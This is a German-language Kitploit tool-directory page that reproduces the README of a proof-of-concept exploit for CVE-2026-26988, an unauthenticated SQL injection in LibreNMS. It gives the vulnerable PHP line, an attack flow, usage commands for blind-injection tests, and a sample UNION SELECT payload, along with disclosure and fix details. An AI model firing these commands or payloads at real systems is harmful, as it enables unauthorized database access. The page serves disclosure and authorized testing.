Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Einreichen
ToolsExploitsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

FeedsKontaktDatenschutz© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-26988-LibreNMS-SQLi — Proof-of-Concept-Exploit für eine nicht authentifizierte SQL-Injection in LibreNMS ajax_table.php, das zeitbasierte und boolesche Blind-Injection-Techniken für autorisierte Sicherheitstests demonstriert. | Kitploit
Tools/GitHubGitHub/mbanyamer/cve-2026-26988-librenms-sqli
SchwachstellenanalyseExploitationWebanwendungs-ExploitationWebsicherheitPenetrationstestsLernen & Bildung
GitHubmbanyamer/cve-2026-26988-librenms-sqli

CVE-2026-26988-LibreNMS-SQLi

Proof-of-Concept-Exploit für eine nicht authentifizierte SQL-Injection in LibreNMS ajax_table.php, das zeitbasierte und boolesche Blind-Injection-Techniken für autorisierte Sicherheitstests demonstriert.

Repository anzeigen
14vor 7 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Author Role Country Platform Vulnerability CVE CVSS Status

CVE-2026-26988 – LibreNMS Unauthenticated SQL Injection PoC

Unauthenticated SQL Injection in LibreNMS ajax_table.php über den IPv6-Adresssuchparameter.

  • Betroffene Versionen: LibreNMS ≤ 25.12.0
  • Behoben in: LibreNMS ≥ 26.1 (Commit 15429580baba03ed1dd377bada1bde4b7a1175a1)
  • CVSS v4.0: 9.3 Kritisch
    CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N
  • CWE: CWE-89 (Fehlende Neutralisierung spezieller Elemente in einem SQL-Befehl – SQL Injection)

Zusammenfassung der Schwachstelle

Der Parameter address wird bei search_type=ipv6 anhand von / in Adresse und Präfix aufgeteilt.
Der Präfix wird direkt ohne Escape in eine SQL-Abfrage eingefügt:

$sql .= " AND ipv6_prefixlen = '$prefix'";

Ein einfaches Anführungszeichen (') im Präfixteil ermöglicht das Ausbrechen aus dem String-Literal → beliebige SQL-Injection.

Angriffsablauf-Diagramm

flowchart TD
    A[Angreifer] -->|1. HTTP POST an /ajax_table.php| B[LibreNMS-Webserver]
    B -->|2. id=address-search & search_type=ipv6| C[Parameter address parsen]
    C -->|3. Aufteilung an '/' → $address / $prefix| D[Verwundbares SQL erstellen]
    D -->|4. Verkettung: ipv6_prefixlen = '$prefix'| E[MySQL / MariaDB]
    E -->|5. Injizierte Abfrage ausführen| F[Ergebnisse / Fehler / Verzögerung zurückgeben]
    F -->|6. Angreifer beobachtet Antwort / Timing| A

    subgraph "Injektionspunkt"
        D
    end

    style D fill:#ff4d4d,stroke:#333,stroke-width:2px,color:#fff

Proof-of-Concept-Nutzung

Voraussetzungen

  • Python 3.x
  • Bibliothek requests (pip install requests)

Basistest (Syntaxfehler / 500)

python3 exploit.py http://target/librenms --test

Zeitbasierte Blind-Bestätigung (empfohlen)

python3 exploit.py http://192.168.1.50/librenms --time

→ Wenn die Antwort >5–6 Sekunden dauert → verwundbar

Boolescher Blind-Test

python3 exploit.py http://target/librenms --boolean

Beispiel für benutzerdefinierten Payload

python3 exploit.py http://target/librenms --test --payload "64' UNION SELECT database(),user(),version() -- "

Dateien in diesem Repository

  • exploit.py .............. Haupt-PoC-Skript (bei Bedarf von cve-2026-26988-poc.py umbenennen)
  • README.md ............... Diese Datei

Verantwortungsvolle Offenlegung

  • Gemeldet: Februar 2026 (über GitHub Security Advisory)
  • Behoben in: Commit 15429580baba... → PR #18777
  • Advisory: https://github.com/librenms/librenms/security/advisories/GHSA-h3rv-q4rq-pqcv

Rechtlicher & ethischer Hinweis

Dieser Proof-of-Concept dient ausschließlich Bildungs- und autorisierten Sicherheitstestzwecken.

Verwenden Sie diesen Code NICHT gegen ein System oder Netzwerk ohne ausdrückliche schriftliche Genehmigung des Eigentümers.
Unbefugte Nutzung kann gegen Gesetze verstoßen, einschließlich (aber nicht beschränkt auf) den Computer Fraud and Abuse Act (CFAA) in den USA oder entsprechende Gesetze in Ihrem Land.

Nutzung auf eigene Gefahr.


Autor: Mohammed Idrees Banyamer
Instagram: @banyamer_security
Datum: 20. Februar 2026

Tool herunterladen